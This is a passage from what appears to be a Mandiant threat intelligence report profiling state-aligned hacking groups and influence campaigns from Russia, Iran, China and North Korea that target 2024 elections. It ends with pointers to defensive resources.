Mandiant believes the pro-People's Republic of China (PRC) HaiEnergy IO campaign is linked to Shanghai Haixun Technology Co., Ltd (上海海讯社科技有限公司), a Chinese PR firm. HaiEnergy used two self-described “press release” services—"Times Newswire" and "World Newswire" —and dozens of subdomains of legitimate U.S.-based news outlets to disseminate campaign materials that appear to come from trustworthy sources. The content is then further amplified by additional inauthentic news sites and associated social media accounts. Mandiant assessed the news sites to be inauthentic because although they presented themselves to be independent news organizations operating in a variety of countries and languages, they were all hosted on infrastructure owned by Haixun, they used the same Chinese-language HTML template, and they frequently included links to, or republished identical content from, other websites in the network. 

Promoted articles praise the PRC and criticize U.S. foreign policy, politicians, and highlight domestic issues, such as ethnic tension or gender inequality. Mandiant observed HaiEnergy promote articles critical of Taiwanese President Lai Ching-te (candidate at the time of this observed activity), describing him as lacking political acumen and the Democratic Progressive Party (DPP) as plagued by internal conflicts and a series of scandals. HaiEnergy assets also promoted narratives positively portraying electoral changes implemented by the PRC in Hong Kong ahead of the district council election.

Significantly, Mandiant uncovered evidence that HaiEnergy financed at least two small, staged in-person protests in Washington, D.C., a marked escalation in tactics leveraged by pro-PRC actors. Both protests, which occurred around June and September 2022, were documented via video and subsequently used as source material to support narratives published by HaiEnergy assets and infrastructure  (Figure 6).

Figure 6: HaiEnergy Accounts Promote Identical Text from Times Newswire Article and Video of Protest in Washington, D.C.

State-Aligned Activity

State-sponsored cyber threat actors target election-related infrastructure for a variety of reasons, although rarely in an attempt to directly impact the result of an election or disrupt voting. Direct interference in elections comes with significant risk of retaliation and escalation leading to most states constraining their activity. Activity against election-related targets is therefore often intended to achieve other objectives, including: 

• Apply pressure on another government around a specific issue or as an attempt to influence foreign policy outcomes.

• Retaliation for previous disputes between the two countries.

• Amplify issues and causes in a foreign country that coincide with a government’s own national interests. 

Mandiant compiled a list of state-aligned cyber threat actors and personas we assess to be likely to target election-related organizations in 2024 (Figure 7). In addition to threat actors focused on intrusion activity, we have also included groups that are involved in cyber threat activity targeting broad public audiences, such as hack and leak and information operations. This is because these public-facing campaigns often serve complementary objectives to more covert intrusion activity, and in some cases are coordinated.

To assess the likelihood of activity, Mandiant considered how likely different threat actors are to target election-related entities and the sort of activity they conduct. This list is based on groups that have been observed targeting government, civil society, media, or technology organizations. 

This list should not be viewed as comprehensive; it is possible that additional known actors or previously unobserved groups will also engage in cyber threat activity related to 2024 elections. However, it could represent a useful guide for prioritizing defensive strategies and hunt missions.

Figure 7: Relevant actors for 2024 global elections threat modeling

Russia

Mandiant assesses with high confidence that Russian state-sponsored cyber threat activity poses the greatest risk to elections in regions that Russia closely monitors, such as the U.S., the UK, and the EU. Multiple Russian groups have targeted past elections in the U.S., France, and Ukraine, and these groups have continued to demonstrate the capability and intent to target elections both directly and indirectly. However, we do not know how Russia’s operational tempo in Ukraine will impact any decision and resources available to target elections in 2024.

APT44 (aka Sandworm Team)

• Intrusion
• Hybrid
• IO

GRU-linked APT44 (aka Sandworm Team) has conducted several of the most impactful hybrid cyber threat operations combining cyber espionage with hack-and-leak and other influence operations related to elections in the U.S., Ukraine, France, and Georgia over the past 10 years. Mandiant previously assessed that hacktivist personas XakNet Team and CyberArmyofRussia_Reborn have collaborated with the GRU's network attacks to create second-order psychological effects during the ongoing conflict in Ukraine. Moreover, Solntsepek has notably been the primary vehicle used to claim responsibility for cyber attacks and to leak stolen documents from operations linked to APT44 in 2023.

UNC4057 (aka COLDRIVER)

• Intrusion
• Hybrid
• IO

UNC4057 conducts cyber espionage and information operations in support of Russian national interests. Mandiant observations suggest that this group has primarily focused on Ukraine and NATO countries since Russia’s 2022 invasion. However, Mandiant believes that UNC4057 poses a risk to election-related organizations because information UNC4057 stole from victim mailboxes has reportedly been used in a hack-and-leak operation seeking to exacerbate Brexit-related political divisions in UK politics in 2022 (Figure 8). Notably, the style of the leak site was reminiscent of the 2016 DCLeaks campaign in the U.S. attributed to APT28. 

KillNet and Other Pro-Russia Hacktivists

• Hybrid

Mandiant is tracking multiple self-proclaimed hacktivist groups primarily conducting DDoS attacks and leaking compromised data in support of Russian interests. These groups claim to have targeted organizations spanning the government, financial services, telecommunications, transportation, and energy sectors in Europe, North America, and Asia; however, target selection and messaging suggests that the activity is primarily focused on the conflict in Ukraine. Relevant groups include KillNet, Anonymous Sudan, NoName057(16), JokerDNR/DPR, Beregini, FRwL_Team (aka "From Russia with Love"), and Moldova Leaks.

NAEBC and Other Pro-Russia IO

• IO

Since October 2020, the inauthentic media organization called the Newsroom for American and European Based Citizens (NAEBC) has persistently attempted to influence U.S. audiences on issues related to U.S. politics and elections. In addition, Mandiant is tracking a variety of other pro-Russia IO campaigns, including RUsponder, Cyber Front Z, Secondary Infektion, and Doppelganger. Belarusian-linked Ghostwriter also frequently promotes pro-Russia narratives. Recent activity from these campaigns has been primarily focused on the war in Ukraine.

APT28

• Intrusion
• Hybrid
• IO

In 2016, GRU-linked APT28 compromised U.S. Democratic Party organization targets as well as the personal account of the Democratic presidential candidate’s campaign chairman and orchestrated a leak campaign ahead of the 2016 U.S. Presidential election. Leaked materials were amplified using the “DC Leaks” persona.

UNC2589 and “Free Civilian”

• Intrusion
• Hybrid
• IO

Mandiant assesses that UNC2589 conducted intelligence collection and destructive attacks against Ukrainian targets ahead of the 2022 Russian invasion, as well as defacements of Ukrainian government websites in 2022 and 2023, claiming credit under false hacktivist persona “Free Civilian.” This cluster is worth monitoring for its potential to threaten global election related organizations and history of conducting destructive attacks combined with hacktivist style tactics.

UNC5101

• Intrusion
• Hybrid
• IO

In addition to traditional cyber espionage against political targets in Europe, Palestinian Territories, and the United States, Mandiant has seen UNC5101 conduct information operations using spoofed Ukrainian government domains and letterhead to disseminate false narratives directly to inboxes of Ukrainian government employees. Ahead of Russia’s September 2023 elections, Mandiant also observed this actor register domains referring to jailed Russian opposition politician Alexei Navalny and his “smart voting” application used to promote candidates with the best odds of defeating those backed by the Kremlin and the United Russia Party. Ahead of Russia’s March 2024 presidential election, Mandiant identified UNC5101 domain registrations and a likely associated IO campaign attempting to deceive Russian opposition voters about the timing of a protest. 

APT29

• Intrusion

 

Mandiant tracks frequent APT29 campaigns targeting diplomatic organizations globally, particularly in Europe and NATO member states. In the past 12 months, Mandiant has observed APT29 targeting technology companies and IT service providers in the United States and Europe, which is a potential risk to elections as APT29 has demonstrated a pattern of targeting these types of organizations to facilitate third party compromises of government and policy organizations. According to open sources, APT29 compromised the Democratic National Committee (DNC) ahead of the 2016 U.S. election.

Figure 8: UNC4057 leak website attempting to inflame public debate around Brexit

Iran

Mandiant assesses with moderate confidence that the risk of Iranian cyber espionage and cyber-enabled influence campaigns will rise as elections approach in key nations of interest to the Islamic Republic, such as counterparts in the currently stalled nuclear negotiations, and countries offering support to Israel during current fighting in Gaza. Past Iranian activity targeting elections has primarily focused on the U.S., and has involved intrusion activity as well as online narrative promotion, claimed data leaks, and attempted voter intimidation. However, observations suggest that Iranian cyber threat groups are currently focused on domestic surveillance, the Gaza conflict, and Iranian opposition organization People's Mojahedin of Iran (MEK), potentially reducing the likelihood of large-scale attempts to interfere with global elections in 2024.

APT42

• Intrusion

Throughout 2023, Mandiant identified domains spoofing U.S. media organizations and think tanks that exhibit similarities to APT42 infrastructure naming and registration patterns for credential harvesting operations. The Iranian APT group TAG tracks as CALANQUE - which has significant overlaps with APT42 - was behind publicly reported attempts in 2020 to compromise email accounts belonging to U.S. presidential campaign staff. Microsoft reported similar activity. 

UNC2448

• Intrusion
• Hybrid

In 2022, the U.S. indicted threat actors it accused of conducting ransomware operations in the United States, United Kingdom, Israel, and elsewhere. Joint reporting from U.S., UK, Canadian, and Australian officials and U.S. sanctions linked the indicted individuals to the Islamic Revolutionary Guard Corps (IRGC) and highlighted that they also pursue a cyber espionage mission. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) disclosed that an Iranian threat actor Mandiant tracks as UNC2448 exploited the Log4Shell vulnerability (CVE-2021-44228) to compromise a Federal Civilian Executive Branch (FECB) organization in 2022.

UNC757

• Intrusion
• Hybrid

In September 2020, CISA disclosed that UNC757 targeted U.S. federal agencies, exploiting VPN vulnerabilities and installing web shells. Mandiant tracked similar activity through late 2019 and early 2020. In April 2023, the head of U.S. Cyber Command’s Cyber National Mission Force, disclosed that UNC757 had successfully gained access to a U.S. city website used to report election results during the 2020 election. This access could have been used to stage a defacement reporting false election results, though reporting indicates that Cyber Command removed the attackers’ access before any additional activity took place.

Pro-Iran Hacktivist Personas

• Hybrid
• IO

Mandiant is tracking several threat actor personas that claim to be conducting hacktivist or cyber criminal operations, such as hack-and-leak activity or ostensible ransomware encryption resulting in data destruction. Mandiant notes that messaging and target selection for these personas often aligns with Iranian strategic interests. According to U.S. officials, many of the most significant pro-Iran disruptive or hack-and-leak incidents from the past several years can be linked back to Iranian company Emennet Pasargad, which TAG tracks as MARNANBRIDGE, including efforts to disrupt the 2020 U.S. election, as previously described. In November 2022, open sources reported that an additional persona, “Al-Toufan,” defaced Bahraini government websites ahead of the nation’s general elections. 

Pro-Iran IO

• IO

Mandiant tracks a number of notable pro-Iran influence campaigns (e.g., Liberty Front Press (LFP), Roaming Mayfly, and Endless Mayfly), and Mandiant has observed these campaigns target audiences globally and leverage wide-ranging TTPs. Influence infrastructure used in operations attributed to these campaigns most frequently relied on Arabic-language assets and targeted countries within Iran's sphere of influence. Mandiant has observed pro-Iran influence campaigns impersonating voters and officials and promoting partisan content during past U.S. elections, though we also note the use of websites and networks of social media accounts focused on the UK, India, and Indonesia used to promote narratives in line with Iranian interests. Recurring themes promoted by these campaigns amplify both anti-U.S. and anti-Israel narratives. 

China

Mandiant expects PRC state-sponsored intrusions to focus on election-related targets for intelligence collection while pro-PRC influence operations generally praise China and undermine its adversaries. Mandiant has seen pro-China information operations campaigns carry out election-related activity in the U.S., Taiwan, and Hong Kong. These campaigns used AI-generated imagery and video content, and used increasingly nuanced tactics, such as posing as legitimate organizations or real individuals, to target and engage authentic users with some success. A segment of their activity appears to have increased audience engagement in the form of comments, likes, and/or shares from seemingly authentic accounts. As of the time of writing, Mandiant has not observed Chinese state-sponsored actors combine intrusion activity with information operations, though we have observed pro-PRC actors using falsified allegedly leaked materials to drive campaigns.

Observed Activity Surrounding the January 2024 Taiwanese Election

• Cyber Espionage: Mandiant observed TEMP.Hex and other PRC cyber espionage actors target Taiwanese organizations in the education, technology, government, and telecommunications sectors in the weeks leading up to and following Taiwan’s January 2024 election. In late summer, TAG tracked multiple PRC APT phishing campaigns targeting members of all three political parties, the TPP, the DPP, and the KMT. More broadly, TAG noted a substantial increase in Chinese cyber espionage targeting of Taiwan in 2023 compared to 2022.
• Information Operations: In the days surrounding the 2024 Taiwan presidential election held on Jan. 13, 2024, Mandiant observed an influx of pro-PRC information operations (IO) activity promoting a wide variety of narratives pertaining to the election. Mandiant identified three notable operations that leveraged seeded content and/or purportedly leaked information to promote narratives containing ad hominem attacks against outgoing President Tsai Ing-wen and President-elect Lai Ching-te. Allegedly leaked materials included a dubious DNA report purportedly providing evidence supporting the narrative that Lai has an illegitimate child and documents and audio recordings cited in a video as purported evidence supporting the claim that Lai had worked as a government informant, spying on DPP officials. We have not independently validated the authenticity of the allegedly leaked information; however, multiple sources, including official statements and credible media reports, indicate that the various alleged "leaked" information is likely false.
  
  

TEMP.Hex

• Intrusion

Prolific TEMP.Hex activity targeting governments, think tanks, and foreign affairs organizations across Asia, Europe, North America, Oceania, the Middle East, and Africa likely seeks intelligence to support China’s political and economic interests. In August 2023, Mandiant identified a likely TEMP.Hex phishing operation using a Taiwanese presidential-themed lure to deliver a malicious Microsoft Windows Installer (MSI) file that, when executed, delivered the SOGU.SEC backdoor. In March 2023, Mandiant identified suspected TEMP.Hex phishing activity using lure documents named "Myan-Russia" and "General election" to deliver BROWNSPARK to targets in Southeast Asia. It is possible that the election-themed lures were referencing proposed plans to hold elections in Myanmar for the first time in decades.

APT41

• Intrusion

APT41 conducted large-scale vulnerability exploitation and scanning activity that compromised U.S. government organizations ahead of the 2020 and 2022 U.S. election cycles.

APT31

• Intrusion

In March 2024, the UK disclosed that APT31 “almost certainly” conducted reconnaissance against email accounts of UK parliamentarians in 2021. The U.S. DOJ likewise described APT31 activity targeting politicians. UK officials also announced that unspecified PRC threat actors compromised the UK electoral commission from 2021 to 2022, likely exfiltrating Electoral Register and email data. Proofpoint described phishing activity targeting U.S.-based journalists focused on politics and national security throughout 2021 and 2022, often posing as journalists to conduct this activity. Mandiant tracks the group referenced in the report as APT31. In 2021, Finnish officials indicated that APT31 targeted its parliament in 2020. Google TAG reported that APT31 targeted U.S. President Biden’s campaign staff during the 2020 U.S. election. In the March 2024 indictment, the U.S. DOJ confirms that APT31 targeted election campaign staff from both major parties in 2020. 

APT40

• Intrusion

New Zealand announced in March 2024 that APT40 compromised its Parliamentary Counsel Office and Parliamentary Services in 2021. Mandiant assesses with high confidence that APT40 compromised the website of Cambodia's National Election Commission in mid-2018 based on the use of AIRBREAK malware, overlaps with previously identified infrastructure, and consistent targeting. Cambodia's July 2018 elections likely served as the major driver for this campaign as Cambodia supports Beijing in South China Sea disputes and construction of the Belt and Road Initiative (BRI).

UNC3658

• Intrusion

From March to May 2022, Mandiant identified multiple examples of election-themed lure material leveraged against the Philippine Government ahead of its May elections, including "Risk Factors on National and Local Elections 2022.docx" and "CSAFP'S_GUIDANCE_RE_NATIONAL_AND_LOCAL_ELECTION_2022_NLE
.docx." The timing of this activity, which took place prior to the May 2022 general election in the Philippines, may indicate specific interest in election-related information. It is also possible that the threat actors sought to take advantage of general interest in the election to support other collection objectives.

UNC4713

• Intrusion

UNC4713 targeted attendees of the 2023 G7 summit in Hiroshima with spear phishing messages. The campaign used a compromised Indonesian Ministry of Foreign Affairs G20 account to send the phishing messages. Recipients included individuals from Australia, Canada, India, Italy, Singapore, and the UK. While this targeting is not election specific, it represents recent interest and capacity to target government organizations in a number of countries holding elections in 2024.

Pro-PRC Influence Campaign (DRAGONBRIDGE)

• IO

In addition to a regular cadence of DRAGONBRIDGE pro-PRC IO activity promoting diverse narratives regarding global politics, news events, and issues concerning the domestic and foreign affairs of various countries and regions, Mandiant has observed narrative promotion specifically targeting 2024 elections in Taiwan (Figure 9) and the U.S. 

Pro-PRC IO Campaign (HaiEnergy)

• IO

Pro-PRC IO campaign HaiEnergy-promoted articles frequently criticize U.S. foreign policy, U.S. politicians, and highlight purported examples of domestic friction, such as ethnic or gender inequality. Content also praises PRC policies. In December 2023, Mandiant observed HaiEnergy promote articles critical of Taiwanese Presidential candidate Lai, describing him as lacking political acumen and the DPP as plagued by internal conflicts and a series of scandals. HaiEnergy assets also promoted narratives positively portraying electoral changes implemented by the PRC in Hong Kong ahead of the district council election in December 2023.

Pro-PRC influence campaign (Fictitious Brands)

• IO

Mandiant identified a pro-PRC IO campaign that we assess with high confidence is promoting content pertaining to the U.S., Tibet, and India in support of the PRC. This campaign consists primarily of clusters of X (formerly Twitter) accounts that pose as independent media outlets, research institutions, or social organizations that we judge to be fictitious brands, and an amplifier network. The U.S.-focused accounts posted ideologically inconsistent partisan content copied from other users, including posts attempting to initiate “follow trains”, boost follower counts, and foster engagement. The "U News" fictitious brand account reposted a TikTok video showing a "deepfake" of U.S. actor Morgan Freeman criticizing U.S. President Joe Biden.

Figure 9: Sample Posts by DRAGONBRIDGE Accounts Targeting the 2024 Taiwan Presidential Election with Chinese-Language Posts Attempting to Discourage Taiwanese Citizens from Voting for the DPP

North Korea

Prior to the April 10, 2024 election, Mandiant forecast that Democratic People’s Republic of Korea (DPRK) government-affiliated actors would conduct campaigns to collect relevant intelligence from South Korean government organizations, political parties, and technology and manufacturing firms around the 2024 South Korean legislative election. In early 2024, Mandiant tracked operations associated with several North Korean threat groups targeting South Korean civil society and nonprofits, media entities, and other organizations.

APT43

• Intrusion

Prior to the March 2022 South Korean presidential election, Mandiant identified samples of GOLDDRAGON.POWERSHELL that we attribute to APT43. This activity appears to be consistent with South Korean media reporting describing an increase in North Korean cyber threat activity targeting security, defense, and diplomacy experts in February 2022. Similarly, Mandiant uncovered a spear-phishing campaign targeting South Korea-based media organizations, Korean webmail portals, and international non-governmental organizations (NGOs) promoting democracy from late March to early April 2020, immediately preceding the April 2020 South Korean legislative election. 

Conclusion 

Impacts to elections are not a foregone conclusion. Many of the aforementioned actors have struggled to influence or achieve significant effects, despite their best efforts. Wary and experienced defenders and populations are harder targets and without the element of surprise adversaries will be at a disadvantage.

Within Google, we are blending different perspectives on the threat landscape across TAG, Mandiant, VirusTotal, Google Cloud, and Trust & Safety. And we’re sharing information about intelligence, insights, and the action we’re taking with the security community and broader public through a variety of fora, such as our Google Safety Engineering Centers, Mandiant reporting, and the quarterly TAG Bulletin on the coordinated influence operation campaigns that Google disrupts.   

Additional tools and resources

For mitigation and hardening recommendations, please review the following:

• How to Understand and Action Mandiant's Intelligence on Information Operations blog post

• Proactive Preparation and Hardening to Protect Against Destructive Attacks white paper

• Linux Endpoint Hardening to Protect Against Malware and Destructive Attacks white paper

• Distributed Denial of Service (DDoS) Protection Recommendations white paper

Google offers a suite of free of cost tools to help protect high-risk users from the most pervasive digital attacks, to which politicians, journalists, and campaigns are often most vulnerable. Examples include protecting accounts from targeted attacks with Advanced Protection Program and safeguarding campaign websites from DDoS attacks with Project Shield. Review these linked blog posts for more specifics on how Google is supporting the U.S., Indian, and EU elections this year.